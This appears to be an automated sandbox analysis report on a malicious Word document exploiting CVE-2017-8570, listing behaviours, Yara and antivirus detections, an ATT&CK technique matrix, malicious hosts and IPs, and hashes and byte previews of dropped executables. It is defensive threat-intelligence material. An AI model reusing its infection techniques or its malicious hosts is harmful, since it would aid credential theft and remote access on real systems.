          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Users\user\AppData\Roaming\explorer.exeQueries volume information: C:\Users\user\AppData\Roaming\explorer.exe VolumeInformation
          Source: C:\Users\user\AppData\Roaming\explorer.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\System32\notepad.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DZdtfhgYgeghD{ .scT VolumeInformation
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Lowering of HIPS / PFW / Operating System Security Settings

          barindex
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeRegistry key created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings MaxConnectionsPerServer 10Jump to behavior
          Source: explorer.exe, 00000014.00000002.994309984.0000000005DA9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: procdump.exe

          Stealing of Sensitive Information

          barindex
          Source: Yara matchFile source: 29.2.explorer.exe.28d63b8.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.explorer.exe.3a2b638.11.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 29.2.explorer.exe.28e9850.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.explorer.exe.28e1ce0.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 20.2.explorer.exe.28daffc.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 20.2.explorer.exe.28d3db0.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 20.2.explorer.exe.28e7248.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 29.2.explorer.exe.28dd604.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.explorer.exe.28daa94.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.explorer.exe.28edf2c.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.explorer.exe.3a0d418.10.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.explorer.exe.3a2b638.11.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000011.00000003.963529024.00000000006B1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000002.985267506.000000000289A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000000.956682708.0000000000414000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.971704816.0000000003A0D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000003.963466175.00000000006A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000003.963980442.00000000006B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001D.00000002.1032860739.00000000028B4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.964367584.0000000002891000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 29.2.explorer.exe.28d63b8.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.explorer.exe.3a2b638.11.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 29.2.explorer.exe.28e9850.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.explorer.exe.28e1ce0.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 20.2.explorer.exe.28daffc.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 20.2.explorer.exe.28d3db0.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 20.2.explorer.exe.28e7248.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 29.2.explorer.exe.28dd604.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.explorer.exe.28daa94.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.explorer.exe.28edf2c.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.explorer.exe.3a0d418.10.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.explorer.exe.3a2b638.11.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000011.00000003.963529024.00000000006B1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000002.985267506.000000000289A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000000.956682708.0000000000414000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.971704816.0000000003A0D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000003.963466175.00000000006A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000003.963980442.00000000006B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001D.00000002.1032860739.00000000028B4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.964367584.0000000002891000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 2360, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 2040, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 676, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 1248, type: MEMORYSTR

          Remote Access Functionality

          barindex
          Source: Yara matchFile source: 29.2.explorer.exe.28d63b8.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.explorer.exe.3a2b638.11.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 29.2.explorer.exe.28e9850.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.explorer.exe.28e1ce0.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 20.2.explorer.exe.28daffc.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 20.2.explorer.exe.28d3db0.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 20.2.explorer.exe.28e7248.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 29.2.explorer.exe.28dd604.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.explorer.exe.28daa94.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.explorer.exe.28edf2c.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.explorer.exe.3a0d418.10.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.explorer.exe.3a2b638.11.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000011.00000003.963529024.00000000006B1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000002.985267506.000000000289A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000000.956682708.0000000000414000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.971704816.0000000003A0D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000003.963466175.00000000006A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000003.963980442.00000000006B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001D.00000002.1032860739.00000000028B4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.964367584.0000000002891000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts2
          Scripting
          1
          Scheduled Task/Job
          412
          Process Injection
          11
          Disable or Modify Tools
          11
          Input Capture
          2
          File and Directory Discovery
          Remote Services1
          Archive Collected Data
          Exfiltration Over Other Network Medium2
          Ingress Tool Transfer
          Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
          Endpoint Denial of Service
          Default Accounts1
          Shared Modules
          Boot or Logon Initialization Scripts1
          Scheduled Task/Job
          2
          Scripting
          LSASS Memory13
          System Information Discovery
          Remote Desktop Protocol11
          Input Capture
          Exfiltration Over Bluetooth1
          Encrypted Channel
          Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain Accounts33
          Exploitation for Client Execution
          Logon Script (Windows)Logon Script (Windows)1
          Obfuscated Files or Information
          Security Account Manager211
          Security Software Discovery
          SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
          Non-Standard Port
          Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local Accounts11
          Command and Scripting Interpreter
          Logon Script (Mac)Logon Script (Mac)11
          Software Packing
          NTDS2
          Process Discovery
          Distributed Component Object ModelInput CaptureScheduled Transfer2
          Non-Application Layer Protocol
          SIM Card SwapCarrier Billing Fraud
          Cloud Accounts1
          Scheduled Task/Job
          Network Logon ScriptNetwork Logon Script1
          Timestomp
          LSA Secrets21
          Virtualization/Sandbox Evasion
          SSHKeyloggingData Transfer Size Limits112
          Application Layer Protocol
          Manipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable Media3
          PowerShell
          Rc.commonRc.common13
          Masquerading
          Cached Domain Credentials1
          Application Window Discovery
          VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup Items21
          Virtualization/Sandbox Evasion
          DCSync1
          Remote System Discovery
          Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job412
          Process Injection
          Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
          Hidden Files and Directories
          /etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
          Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)1
          Hidden Users
          Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 708250 Sample: Item Selection - Inquiry 00... Startdate: 23/09/2022 Architecture: WINDOWS Score: 100 74 Snort IDS alert for network traffic 2->74 76 Malicious sample detected (through community Yara rule) 2->76 78 Sigma detected: Scheduled temp file as task from temp location 2->78 80 17 other signatures 2->80 8 WINWORD.EXE 301 46 2->8         started        process3 dnsIp4 68 login.929389.ankura.us 159.223.2.212, 49171, 49172, 80 CELANESE-US United States 8->68 58 C:\Users\user\AppData\...\explorer[1].exe, PE32 8->58 dropped 60 C:\Users\user\AppData\...\DZdtfhgYgeghD{ .scT, data 8->60 dropped 62 C:\Users\user\AppData\Local\...\CA1522E6.png, 370 8->62 dropped 100 Document exploit detected (creates forbidden files) 8->100 102 Suspicious powershell command line found 8->102 104 Tries to download and execute files (via powershell) 8->104 106 2 other signatures 8->106 13 cmd.exe 8->13         started        15 cmd.exe 8->15         started        17 cmd.exe 8->17         started        19 5 other processes 8->19 file5 signatures6 process7 dnsIp8 24 explorer.exe 1 8 13->24         started        28 explorer.exe 2 15->28         started        30 explorer.exe 17->30         started        66 login.929389.ankura.us 19->66 52 C:\Users\user\AppData\Roaming\explorer.exe, PE32 19->52 dropped 82 Drops PE files with benign system names 19->82 84 Powershell drops PE file 19->84 86 Injects files into Windows application 19->86 file9 signatures10 process11 file12 54 C:\Users\user\AppData\...\eDdYRRbouy.exe, PE32 24->54 dropped 56 C:\Users\user\AppData\Local\...\tmpE14B.tmp, XML 24->56 dropped 88 Machine Learning detection for dropped file 24->88 90 Uses schtasks.exe or at.exe to add and modify task schedules 24->90 92 Writes to foreign memory regions 24->92 32 MSBuild.exe 3 2 24->32         started        36 powershell.exe 6 24->36         started        38 schtasks.exe 24->38         started        40 MSBuild.exe 24->40         started        94 Allocates memory in foreign processes 28->94 96 Adds a directory exclusion to Windows Defender 28->96 98 Injects a PE file into a foreign processes 28->98 42 powershell.exe 28->42         started        44 schtasks.exe 28->44         started        46 MSBuild.exe 28->46         started        48 powershell.exe 30->48         started        50 2 other processes 30->50 signatures13 process14 dnsIp15 64 20.126.95.155, 49173, 7800 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 32->64 70 Increases the number of concurrent connection per server for Internet Explorer 32->70 72 Hides that the sample has been downloaded from the Internet (zone.identifier) 32->72 signatures16

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          Item Selection - Inquiry 0054363AZH - AltayGlobal Trading.doc32%ReversingLabsScript.Exploit.CVE-2017-8570
          Item Selection - Inquiry 0054363AZH - AltayGlobal Trading.doc51%VirustotalBrowse
          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Roaming\eDdYRRbouy.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Roaming\explorer.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\explorer[1].exe100%Joe Sandbox ML
          SourceDetectionScannerLabelLinkDownload
          8.2.explorer.exe.3a2b638.11.unpack100%AviraTR/AD.MortyStealer.utbzgDownload File
          17.0.MSBuild.exe.400000.0.unpack100%AviraTR/Redcap.ghjptDownload File
          No Antivirus matches
          SourceDetectionScannerLabelLink
          httP://login.929389.ank0%Avira URL Cloudsafe
          http://login.929389.ankura.us0%Avira URL Cloudsafe
          httP://login.9290%Avira URL Cloudsafe
          httP://login.929389.ankura.us/Aw0%Avira URL Cloudsafe
          20.126.95.1550%Avira URL Cloudsafe
          NameIPActiveMaliciousAntivirus DetectionReputation
          login.929389.ankura.us
          159.223.2.212
          truetrue
            unknown
            NameMaliciousAntivirus DetectionReputation
            20.126.95.155true
            • Avira URL Cloud: safe
            unknown
            NameSourceMaliciousAntivirus DetectionReputation
            http://login.929389.ankura.uspowershell.exe, 00000004.00000002.922412299.00000000034EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.922726566.00000000035E7000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://www.piriform.com/ccleanerpowershell.exe, 00000009.00000002.936831112.000000000038E000.00000004.00000020.00020000.00000000.sdmpfalse
              high
              httP://login.929powershell.exe, 00000004.00000002.922412299.00000000034EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.945493168.00000000034AA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.985143233.0000000003643000.00000004.00000800.00020000.00000000.sdmptrue
              • Avira URL Cloud: safe
              low
              httP://login.929389.ankpowershell.exe, 00000013.00000002.985143233.0000000003643000.00000004.00000800.00020000.00000000.sdmptrue
              • Avira URL Cloud: safe
              unknown
              httP://login.929389.ankura.us/Awpowershell.exe, 00000004.00000002.922412299.00000000034EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.945493168.00000000034AA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.985143233.0000000003643000.00000004.00000800.00020000.00000000.sdmptrue
              • Avira URL Cloud: safe
              unknown
              http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervpowershell.exe, 00000009.00000002.936831112.000000000038E000.00000004.00000020.00020000.00000000.sdmpfalse
                high
                https://github.com/syohex/java-simple-mine-sweeperC:explorer.exe, 00000008.00000002.971704816.0000000003A0D000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.964367584.0000000002891000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.963529024.00000000006B1000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000000.956682708.0000000000414000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.963466175.00000000006A5000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.963980442.00000000006B7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.985267506.000000000289A000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001D.00000002.1032860739.00000000028B4000.00000004.00000800.00020000.00000000.sdmpfalse
                  high
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameexplorer.exe, 00000008.00000002.964367584.0000000002891000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.985267506.000000000289A000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001D.00000002.1032698870.000000000289A000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs
                    IPDomainCountryFlagASNASN NameMalicious
                    20.126.95.155
                    unknownUnited States
                    8075MICROSOFT-CORP-MSN-AS-BLOCKUStrue
                    159.223.2.212
                    login.929389.ankura.usUnited States
                    46118CELANESE-UStrue
                    Joe Sandbox Version:36.0.0 Rainbow Opal
                    Analysis ID:708250
                    Start date and time:2022-09-23 08:12:10 +02:00
                    Joe Sandbox Product:CloudBasic
                    Overall analysis duration:0h 10m 47s
                    Hypervisor based Inspection enabled:false
                    Report type:light
                    Sample file name:Item Selection - Inquiry 0054363AZH - AltayGlobal Trading.doc
                    Cookbook file name:defaultwindowsofficecookbook.jbs
                    Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                    Number of analysed new started processes analysed:38
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • HDC enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Detection:MAL
                    Classification:mal100.phis.troj.expl.evad.winDOC@43/31@2/2
                    EGA Information:
                    • Successful, ratio: 60%
                    HDC Information:Failed
                    HCA Information:
                    • Successful, ratio: 77%
                    • Number of executed functions: 0
                    • Number of non-executed functions: 0
                    Cookbook Comments:
                    • Found application associated with file extension: .doc
                    • Found Word or Excel or PowerPoint or XPS Viewer
                    • Attach to Office via COM
                    • Active ActiveX Object
                    • Scroll down
                    • Close Viewer
                    • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe, svchost.exe
                    • TCP Packets have been reduced to 100
                    • Execution Graph export aborted for target MSBuild.exe, PID 2040 because there are no executed function
                    • Execution Graph export aborted for target powershell.exe, PID 1624 because it is empty
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size exceeded maximum capacity and may have missing behavior information.
                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                    • Report size getting too big, too many NtCreateFile calls found.
                    • Report size getting too big, too many NtEnumerateValueKey calls found.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtQueryAttributesFile calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    TimeTypeDescription
                    08:13:19API Interceptor126x Sleep call for process: powershell.exe modified
                    08:13:32API Interceptor477x Sleep call for process: explorer.exe modified
                    08:13:39API Interceptor4x Sleep call for process: schtasks.exe modified
                    08:13:47API Interceptor232x Sleep call for process: MSBuild.exe modified
                    08:14:29API Interceptor1x Sleep call for process: notepad.exe modified
                    No context
                    No context
                    No context
                    No context
                    No context
                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                    Category:dropped
                    Size (bytes):974336
                    Entropy (8bit):6.592752877706246
                    Encrypted:false
                    SSDEEP:12288:ahLuyAHrR2ZEgL6+8ik8VuLCBTodngkt8OsyqAx+NbqzjMRZeFoTPo:ahLuyyNmadFdgsF+NZRZeFgo
                    MD5:87B246B26208A9831A4372664C518C2C
                    SHA1:1599CBF0EE49DCB787866FBB7C297094ECD3AB4F
                    SHA-256:27FD2AB0BBD65CBE5625932FA7AB1F484A06CBDFF8868129F10CD92321D99DAF
                    SHA-512:4E7F5A217DBCD34EAADF867CD75ACB23AE01730794AE8AC23A2428BE5160FA8DFF78B5B3E202A1E898E73126CEA4FE19BF6A9F6457D136433D61E16435D69FF1
                    Malicious:true
                    Antivirus:
                    • Antivirus: Joe Sandbox ML, Detection: 100%
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...MP................0.................. ... ....@.. .......................@............@.................................0...O.... ..X.................... ....................................................... ............... ..H............text........ ...................... ..`.rsrc...X.... ......................@..@.reloc....... ......................@..B................d.......H.......$....X......6.......p.............................................s}...}......}.....(.......(.....*..0...........s......o......(.....*...0............{....o....r...p(....,..{....o....r...p(....,..{....o....r...p(....+....9......{....o.....{....o....(......,W..{.....{....o.....{....o....o|.....,#.r...p(....&s......o......(......+.r)..p(....&.+.rK..p(....&.r...p(....&*....0..+.........,..{.......+....,...{....o........(.....*..0............s....}.....s....}.....s....}..
                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                    File Type:Targa image data - Map - RLE 1569 x 65536 x 0 +2 "\005"
                    Category:dropped
                    Size (bytes):3712
                    Entropy (8bit):5.0373299643815015
                    Encrypted:false
                    SSDEEP:48:PuWik/UKHl3G6nj6rmbYf3LSrd/lO88e0f5aSdJ9nNk3t1fF:Ok7Hgwj+mbYf3LSrhlOs0f5aSdHn63DN
                    MD5:40A11389936D01876DE8991EE13B1DE9
                    SHA1:DF39D9926B2DB17D0A7E2153E6F5A31E14A7720A
                    SHA-256:FE9542C02AA1DE4322B580AA19D880DE54EE88F7D6280ADCB244FC2D9EAF45DE
                    SHA-512:8EB4AEB3008313A7B7A8BE1298F30CB09789F4F19008D8DE2D2D30C4F69C814A4C3871281590AC8E510AFEC0C2073D8DA6BCC2A0C2B494709214A0DD3DCF258A
                    Malicious:false
                    Preview:......@.....!.....................5...........................Segoe UI....C.......@...............-...........................A..... . ..... . ...7.(... ...@.............................................................................................................................................................................................................................................................................................?.........!...A.F.f. . ..... . ...7.(... ... ................................................................................................................................................................................................................................................................................................................................G .>..:..9..8..8..8..9..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:.i2........K..S(.O$.N!.N!.N!.N!.N".M".M".M".M".M".M".M".M".M".M".M".M".M".M".M".M".N".M".M".O$.S).O".......l
                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                    File Type:370 sysV pure executable
                    Category:dropped
                    Size (bytes):262160
                    Entropy (8bit):0.029176838226622752
                    Encrypted:false
                    SSDEEP:12:dlL/lfuNH1RCZK4vFQyfulTa5Pw1ETgobVOI7lP1g6UKE/Ws8GH:dlFsHT8v5GIw1Ew2sEi8+
                    MD5:E582F2A011171992316D5DAA68512ED7
                    SHA1:C71EEFB93628195D21512BBF499AFCC64BB42E33
                    SHA-256:2580C3E1913FBC5CE7F2E5D4F4349F2F130A3980B1A4D6E824883EC9120F903E
                    SHA-512:D2B16F427CF3D8F0D282CE00B3564F838E8153D4681C5EEEE648FA677CEC564C2EF2DC15D6144AB92E11C12C2A32395B4AE4C08A12580FEE4ECF9841C0E07651
                    Malicious:false
                    Preview:X.'.....0Z......................`,. .:i.....+00..................S...Bi.....+00.................@._d.P......./.N................h..&...D.q..d..................G..Yr?.D..U..k0.................%H...{.M.1.F.L..................g.s.3..E..J.......................u...CB.2......................a..f."M..J.3\.+.......................I......]................M.6C...F....R......................E%.......6.....................S.llM....p..................v5..k.L.T..N.......................0%O.+U==e....................C.7.IJ..K-...k................P....YL.QX.Sh=s.................?.....B....e...................{.z..!.A....h.k~.................S..M.F....,0e................_.E.\C..N.,&%..................".pH....,..R..................,.!.PC..sg...<................L...X.(G.Y...9'.........................................................................................................................3..2............................................................................................
                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                    File Type:Composite Document File V2 Document, Cannot read section info
                    Category:dropped
                    Size (bytes):47104
                    Entropy (8bit):5.2958250054182585
                    Encrypted:false
                    SSDEEP:768:2OwzakaBa9aRaOa2EgpvaPCOoYPW1+wnAn8rb8WkWDOwzakaBa9aRaOa2EgpvaPF:2OwzakaBa9aRaOa2EOLndkWDOwzakaBq
                    MD5:668B497E20E06B79D51DF9168519289D
                    SHA1:FEFFA7A4A5DBC1BFBF1EAA060F8C1FA9B1D220B2
                    SHA-256:7D5D867A0DC8ACC36333DA47F96F772F88935ABA0FD126B3B8B2A5E49F936D1E
                    SHA-512:867B25C88B501A0D69912FBFE9B2629F2A3D034637B78F5B27ECE14D9D90B7523720053D351AFE03782779207146FF160FA6740D73BC9EACACAF011239A31DCB
                    Malicious:false
                    Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................W...$...#........................................................................................................... ...!...".......%...&...+...'...(...)...*.......,...-.../...N...V...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M.......O...P...Q...R...S...T...U...X...........Y...Z...................................................................................................................................
                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                    File Type:data
                    Category:dropped
                    Size (bytes):44098
                    Entropy (8bit):2.8795995628350415
                    Encrypted:false
                    SSDEEP:768:jl/3ViFs0Dqeb4Zep84JtueJvCI19rIwzWSgUg4P58F:pFia0Dqeb0nstw29rVzWSgm58F
